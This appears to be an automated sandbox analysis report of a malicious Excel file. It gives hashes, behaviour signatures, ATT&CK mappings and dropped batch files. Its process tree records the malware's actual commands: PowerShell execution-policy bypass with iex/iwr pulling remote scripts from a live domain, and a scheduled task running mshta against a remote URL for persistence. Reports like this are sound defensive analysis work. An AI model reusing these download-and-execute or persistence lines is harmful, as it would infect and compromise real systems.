Analysis

  • max time kernel
    148s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.13262.xls

  • Size

    33KB

  • MD5

    7a115715d7ff051cdc0a008521e2c35e

  • SHA1

    34e5ceddef13f16f6f5ee775c198b5cf76552b55

  • SHA256

    d5d8cca33368d72e3d58ea71e3b4984f336d93b21af1c896141635961a0d777d

  • SHA512

    821f80a21bef4999bfd9f1aa846d1b5649dbb96d4e0acf3004966eb7ba9f418412db0450dcc11c72cca4c8ce1d9c2b9ac0b33ce8083f3e814bc9c74d15ec670e

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.13262.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Windows\system32\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1292
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3612
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2600
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4976
      • C:\Windows\system32\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:3548
      • C:\Windows\system32\cmd.exe
        cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\system32\schtasks.exe
          schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
          4⤵
          • Creates scheduled task(s)
          PID:4320
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4892
      • C:\Windows\system32\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:376
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:100
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3372
      • C:\Windows\system32\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4476
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4344
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4868
      • C:\Windows\system32\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1768
  • C:\Windows\System32\Upfc.exe
    C:\Windows\System32\Upfc.exe /launchtype periodic /cv zjLU7L2E1UuRYr7hmqhQ6Q.0
    1⤵
      PID:612

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      abc27673d9c940ad74b41c58391d2412

      SHA1

      9a31a521a521dcd0f974ce6f7a50aecc69a50df0

      SHA256

      cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

      SHA512

      c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      6KB

      MD5

      e1d6c0074704a2bab7c9c0fc6b159a60

      SHA1

      1db9ce60318edd6c3f1ee8068879c32f830d08b8

      SHA256

      6b97462d29991d0a578776fdcb3f662f2edc66228c50b066ce1bb2358b8ff4c8

      SHA512

      faa7f00d7630aadd083a01911f255e3eb433ac89d92680959da116e6d31c3c12f8cf9e46cdd121a36fe0052efeea46f4cf52e64101af86e72c9752fe8a4e3c7a

    • C:\Users\Public\DefenderFile.bat
      Filesize

      1KB

      MD5

      ae4a0997ce01f4ebbb3f3cc0054ce933

      SHA1

      e5bfe3b390f1208b8b6ea0317f4364005f552851

      SHA256

      a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

      SHA512

      5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

    • C:\Users\Public\Outlook.bat
      Filesize

      900B

      MD5

      0427a3545c2eaed3167cffe2cf5f8aba

      SHA1

      b27f3a7d2b855f1d0b84727603add711bb6f6170

      SHA256

      ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

      SHA512

      fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

    • C:\Users\Public\task.bat
      Filesize

      954B

      MD5

      20a395a26f50352dc994664c3e7df533

      SHA1

      9b6407d22297b7af7c49aacd51bf42e51ced7029

      SHA256

      c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32

      SHA512

      2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617

    • memory/100-148-0x0000000000000000-mapping.dmp
    • memory/376-144-0x0000000000000000-mapping.dmp
    • memory/900-134-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-171-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-170-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-169-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-133-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-135-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-136-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-138-0x00007FFA78330000-0x00007FFA78340000-memory.dmp
      Filesize

      64KB

    • memory/900-168-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/900-137-0x00007FFA78330000-0x00007FFA78340000-memory.dmp
      Filesize

      64KB

    • memory/900-132-0x00007FFA7AC90000-0x00007FFA7ACA0000-memory.dmp
      Filesize

      64KB

    • memory/1292-146-0x0000000000000000-mapping.dmp
    • memory/1768-145-0x0000000000000000-mapping.dmp
    • memory/1996-139-0x0000000000000000-mapping.dmp
    • memory/2600-158-0x0000000000000000-mapping.dmp
    • memory/2600-163-0x00007FFA92000000-0x00007FFA92AC1000-memory.dmp
      Filesize

      10.8MB

    • memory/2600-162-0x00007FFA92000000-0x00007FFA92AC1000-memory.dmp
      Filesize

      10.8MB

    • memory/3372-152-0x000001C429250000-0x000001C429272000-memory.dmp
      Filesize

      136KB

    • memory/3372-153-0x00007FFA92000000-0x00007FFA92AC1000-memory.dmp
      Filesize

      10.8MB

    • memory/3372-154-0x00007FFA92000000-0x00007FFA92AC1000-memory.dmp
      Filesize

      10.8MB

    • memory/3372-155-0x00007FFA92000000-0x00007FFA92AC1000-memory.dmp
      Filesize

      10.8MB

    • memory/3372-149-0x0000000000000000-mapping.dmp
    • memory/3548-143-0x0000000000000000-mapping.dmp
    • memory/3612-157-0x0000000000000000-mapping.dmp
    • memory/4320-166-0x0000000000000000-mapping.dmp
    • memory/4344-151-0x0000000000000000-mapping.dmp
    • memory/4476-150-0x0000000000000000-mapping.dmp
    • memory/4500-165-0x0000000000000000-mapping.dmp
    • memory/4868-142-0x0000000000000000-mapping.dmp
    • memory/4892-141-0x0000000000000000-mapping.dmp
    • memory/4976-140-0x0000000000000000-mapping.dmp